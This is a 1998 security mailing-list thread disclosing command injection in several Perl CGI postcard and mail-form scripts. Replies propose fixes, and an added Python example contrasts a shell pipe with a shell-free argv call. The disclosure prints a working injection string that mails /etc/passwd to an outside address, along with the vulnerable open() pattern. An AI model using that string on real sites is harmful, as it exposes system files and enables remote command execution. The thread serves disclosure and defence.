Several Perl CGI postcard and mail-form scripts pass the recipient's email address into a shell-interpolated pipe open (`open(MAIL, "|$mailprog $email")`), so shell metacharacters in that field give remote command execution under the web server's uid.
`Date: Mon, 9 Nov 1998 18:26:05 -0600
From: xnec <[email protected]>
To: [email protected]
Subject: Several new CGI vulnerabilities
INFO:
After looking over the perl-CGI scripts on www.cgi-resources.com,
I've discovered vulnerabilities in the following:
1. HAMcards Postcard script v1.0 Beta 2
(www.hamnetcenter.com)
2. Hot Postal Services v??
(www.hotarea.com)
note: the only metacharacter stripping this script does is rejecting
any |'s
3. RC Bowen's Postcards v??
(www.rcbowen.com)
4. LakeWeb's File Mail and Mail List (expanded File Mail) v??
(www.lakeweb.com)
EXPLOIT:
Each of these is exploitable by inputting metacharacters into the
recipient's email address. Each script calls something similar
to:
open( MAIL, "|$mailprog $email" )
# this particular line is from the LakeWeb scripts
The exploit strings are simple, something like
&mail [email protected] < /etc/passwd&@host.com will work for each script
(the @host.com is necessary because some hosts check for "@" and ".")
when placed in the Recipient Email field.
As a result, any command can be executed remotely without a local
account with the uid of the webserver (usually "nobody" or similar,
but you never know).
FIX:
Either fork your sendmail process, strip out metacharacters (or only allow
certain characters), use open (MAIL , "|$sendmail -t") or rm -rf
./cgi-bin.
-xnec
######################################################
# [email protected] - xnec on DALnet and EFnet#
######################################################
-------------------------------------------------------------
Date: Tue, 10 Nov 1998 18:45:24 +1000
From: Karl Hanmore <[email protected]>
To: [email protected]
Subject: Re: Several new CGI vulnerabilities
G'day,
As a related note, the WebCards program (V1.6) by Sam Kareem
([email protected]) is subject to the same vulnerability.
Regards,
Karl
-------------------------------------------------------------
Date: Mon, 9 Nov 1998 19:45:28 -0700
From: Randal Schwartz <[email protected]>
To: [email protected]
Subject: Re: Several new CGI vulnerabilities
>>>>> "xnec" == xnec <[email protected]> writes:
xnec> Either fork your sendmail process, strip out metacharacters (or
xnec> only allow certain characters),
You cannot restrict the permitted characters of an email address.
*Any* character is permitted on the left-side of an @, presuming
the proper quoting is used for those more odd ones.
For example, <fred&[email protected]> is a perfectly valid
email address (try it, an autoresponder responds!).
xnec> use open (MAIL , "|$sendmail -t") or rm -rf
xnec> ./cgi-bin.
Or use Net::SMTP to pass the data directly to port 25.
--
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying
Email: <[email protected]> Snail: (Call) PGP-Key: (finger [email protected])
Web: <A HREF="http://www.stonehenge.com/merlyn/">My Home Page!</A>
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me
-------------------------------------------------------------
Date: Tue, 10 Nov 1998 14:44:23 +0000
From: Gus <[email protected]>
To: [email protected]
Subject: Re: Several new CGI vulnerabilities
On Mon, 9 Nov 1998, xnec wrote:
>
> EXPLOIT:
>
> Each of these is exploitable by inputting metacharacters into the
> recipient's email address. Each script calls something similar
> to:
>
> open( MAIL, "|$mailprog $email" )
This is one that just won't go away, and rather than try the (frankly
quite fruitless) metachar filtering route, it might be an idea for
CGI-providing ISPs to insist on the use of perl's Mail::Sendmail module,
which cuts out any potential pipe/metachar related bugs by communicating
directly w/ the SMTP server.
$LOCAL_CPAN_MIRROR/authors/id/M/MI/MIVKOVIC/Mail-Sendmail-0.74.tar.gz
See http://www.perl.com/CPAN for a list of mirror sites.
Regards
Gus
--
[email protected]
http://www.intasys.com/~angus/
-------------------------------------------------------------
Date: Tue, 10 Nov 1998 14:43:27 -0500
From: Lincoln Stein <[email protected]>
To: [email protected]
Subject: Re: Several new CGI vulnerabilities
Gus writes:
> On Mon, 9 Nov 1998, xnec wrote:
> >
> > EXPLOIT:
> >
> > Each of these is exploitable by inputting metacharacters into the
> > recipient's email address. Each script calls something similar
> > to:
> >
> > open( MAIL, "|$mailprog $email" )
>
> This is one that just won't go away, and rather than try the (frankly
> quite fruitless) metachar filtering route, it might be an idea for
> CGI-providing ISPs to insist on the use of perl's Mail::Sendmail module,
> which cuts out any potential pipe/metachar related bugs by communicating
> directly w/ the SMTP server.
Net::SMTP is more likely to be installed on ISPs'
machines. Mail::Sendmail is a bit of an oddball. There are also other
ways to avoid the fruitless metachar search and destroy mission.
First off, why do people think they need to put the recipient's
address on the command line in the first place?
open (MAIL,"| /usr/lib/sendmail -t -oi");
print MAIL <<END;
To: $mailto
From: me (me\@nowhere.com)
Subject: nothing much
Hi there!
END
close MAIL;
And here's a general Perl technique for opening pipes without getting
the shell involved at all:
open (MAIL,"|-") || exec '/usr/lib/sendmail','-t','-oi';
print MAIL <<END;
To: $mailto
From: me (me\@nowhere.com)
Subject: nothing much
Hi there!
END
close MAIL;
Lincoln
--
========================================================================
Lincoln D. Stein Cold Spring Harbor Laboratory
[email protected] Cold Spring Harbor, NY
========================================================================
`
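The mechanism xnec describes (the shell splitting `$mailprog $email` on the `&` characters in the recipient field) and the no-shell fix from Lincoln Stein's reply, re-created as an added example. This is not code from any of the scripts or posters in the thread, and it is written in Python rather than Perl so that the two behaviours can be compared side by side: `subprocess.run(..., shell=True)` does the same thing as Perl's two-argument `open(MAIL, "|...")`, and the list form does the same thing as `open(MAIL, "|-") || exec LIST`. Assumptions: `/bin/echo` stands in for sendmail so the "mailer" just prints the argv it received, the attacker string is constructed with the thread's shape but injects the harmless command `id`, and the `build_message` helper (for the `sendmail -t -oi` form) is hypothetical.

```python
"""Command injection through a shell-interpolated pipe open, and the fixes
from the thread, re-created in Python.  Constructed example; /bin/echo
stands in for sendmail so we can see exactly what argv the mailer got."""
import subprocess

MAILPROG = "/bin/echo"          # stand-in mailer: prints its arguments

# Constructed attacker input with the same shape as the thread's
# "&mail ... < /etc/passwd&@host.com"; the injected command here is `id`.
EVIL_RECIPIENT = "&id&@host.com"


def mail_via_shell(mailprog, recipient, body):
    """Mirror of  open(MAIL, "|$mailprog $email").
    Perl hands a two-argument pipe open containing metacharacters to /bin/sh,
    which is what shell=True does here: the recipient string is parsed as
    shell syntax, so "&id&" becomes two background jobs and "id" runs."""
    proc = subprocess.run(f"{mailprog} {recipient}", shell=True,
                          input=body, capture_output=True, text=True)
    return proc.stdout


def mail_via_argv(mailprog, args, body):
    """Mirror of  open(MAIL, "|-") || exec '/usr/lib/sendmail', '-t', '-oi'.
    No shell is involved: every element of args reaches the program as one
    argv entry, metacharacters included, so nothing is ever interpreted."""
    proc = subprocess.run([mailprog, *args], input=body,
                          capture_output=True, text=True)
    return proc.stdout


def build_message(to, sender, subject, body):
    """Message text for the  sendmail -t -oi  form, where recipients are read
    from the headers instead of the command line.  That removes the shell from
    the picture, but a CR or LF inside a header value would start a new header
    line (for example an extra Bcc:), so those are refused up front.
    Hypothetical helper, not from the thread."""
    for name, value in (("To", to), ("From", sender), ("Subject", subject)):
        if "\r" in value or "\n" in value:
            raise ValueError(f"{name} header value contains a line break")
    return f"To: {to}\nFrom: {sender}\nSubject: {subject}\n\n{body}\n"


if __name__ == "__main__":
    body = "Hi there!"
    # Shell form: output contains a "uid=..." line from the injected `id`,
    # and the stand-in mailer never sees the address at all.
    print("shell form ->", mail_via_shell(MAILPROG, EVIL_RECIPIENT, body))
    # argv form: the mailer receives the whole string as one argument.
    print("argv form  ->", mail_via_argv(MAILPROG, [EVIL_RECIPIENT], body))
    # -t form: recipient travels in the headers; sendmail would get only flags.
    msg = build_message("fred&wilma@example.com", "me@nowhere.example",
                        "nothing much", body)
    print("argv form with -t ->",
          mail_via_argv(MAILPROG, ["-t", "-oi"], msg), msg)
```

Running it shows the shell form printing the output of `id` (the command the "recipient" smuggled in), while the argv form prints `&id&@host.com` verbatim because the mailer got it as a single argument. The `-t` variant is the one Randal Schwartz's objection leaves intact: an address like `fred&wilma@example.com` is accepted as-is since no character list is being filtered, and the only thing rejected is a line break, which is what would let the address break out of the `To:` header.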